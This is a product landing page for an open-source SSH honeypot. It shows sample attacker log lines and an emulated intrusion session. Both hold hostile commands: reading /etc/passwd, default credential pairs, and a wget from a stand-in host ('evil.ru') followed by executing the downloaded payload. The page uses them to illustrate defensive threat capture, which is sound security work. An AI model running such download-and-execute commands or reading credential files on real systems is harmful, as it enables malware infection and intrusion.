Instant visibility into every session

Turn every
attack into

CipherSentry deploys SSH decoys that lure attackers in, analyzes their techniques and turns every intrusion attempt into actionable intelligence.

Open source: GitHub · MIT License
Integration: Docker · 5 min setup
Compatibility: Linux · Docker · Cloud
Live sessions: real honeypot data
honeypot@ciphersentry:~
root@honeypot:~# tail -f /var/log/honeypot.log
{"ts":"09:11:02","ip":"185.220.[REDACTED].47","user":"admin","pass":"Admin123!","cmd":"uname -a"}
{"ts":"09:11:08","ip":"91.108.[REDACTED].220","user":"root","pass":"toor","cmd":"cat /etc/passwd"}
{"ts":"09:11:15","ip":"45.33.[REDACTED].156","user":"ubuntu","pass":"ubuntu","cmd":"wget http://185.x.x.x/bot.sh"}
{"ts":"09:11:21","ip":"192.241.[REDACTED].12","user":"pi","pass":"raspberry","cmd":"crontab -e"}
ALERT Payload detected · ELF x86_64 · sha256:a3f8...
root@honeypot:~# _
Representative sample of real sessions
Payload detected
ELF · Botnet dropper
648,821
Access attempts captured
2,889
Unique attacking IPs
428,990
Attacker commands logged
44,732
Unique credentials captured

Real data captured by the CipherSentry honeypot in production.

Features

Everything you need to know your attackers

From credential capture to payload analysis, CipherSentry collects every detail of every intrusion attempt.

01

Realistic SSH emulation

A fully simulated Debian 12 system with a virtual filesystem, real commands and plausible responses that fool sophisticated attackers.

02

Credential capture

Records username, password, SSH client version and authentication method. Feed your blocking rules with real data.

03

Real-time geolocation

Every attacking IP geolocated on an interactive map. Visualize attack origins, distributed botnets and regional patterns.

04

Payload capture

Every file an attacker downloads is stored and classified without ever being executed. Analyze ELF droppers, scripts and binaries in a safe environment.

05

Analytics dashboard

Web dashboard with server metrics, session timeline, per-IP analysis, attacker terminal reconstruction and report export.

06

JSON API (stats + IOCs)

Integrate honeypot data into your SIEM, XDR or threat intelligence platform. Token authentication, standard JSON responses.

Flagship product

Next-generation SSH honeypot

It's not just a logger. CipherSentry simulates a full Debian server: a filesystem with real directories, commands with plausible output, interactive editors and compilers that "run" without executing real code.

  • Per-session isolation — each attacker gets its own VFS
  • Download and analyze payloads without ever running them
  • Logs reconnaissance tools, backdoors and miners
  • JSONL-format logs — direct ingestion into Elastic/Splunk
  • Production-ready Docker in under 5 minutes
session · 185.220.[REDACTED].47
Last login: Thu Jun 11 08:42:11 2026 from 185.220.[REDACTED].47
Debian GNU/Linux 12 (bookworm)
 
root@debian-prod:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian-prod:~# wget http://evil.ru/payload.sh
Connecting to evil.ru... connected.
HTTP request sent, awaiting response... 200 OK
Saving to: 'payload.sh' [4.2 KB]
root@debian-prod:~# chmod +x payload.sh && ./payload.sh
root@debian-prod:~# _
Payload captured and analyzed · Execution blocked
Community

Be one of the first to deploy it

CipherSentry is in early access. We're looking for security teams that want to capture real intelligence on attackers and give us direct feedback.

The first teams will get priority access, direct support from the team and founder pricing.

PDF ~171 KB · ES/EN
Free report · Intelligence series
Anatomy of an SSH attack
From the first echo to the root password change — 4 chapters with real data from our honeypot
Start today

Set the decoy.
Capture the intelligence.

Open source under the MIT license. Free plan up to 10,000 commands/month. No credit card to get started.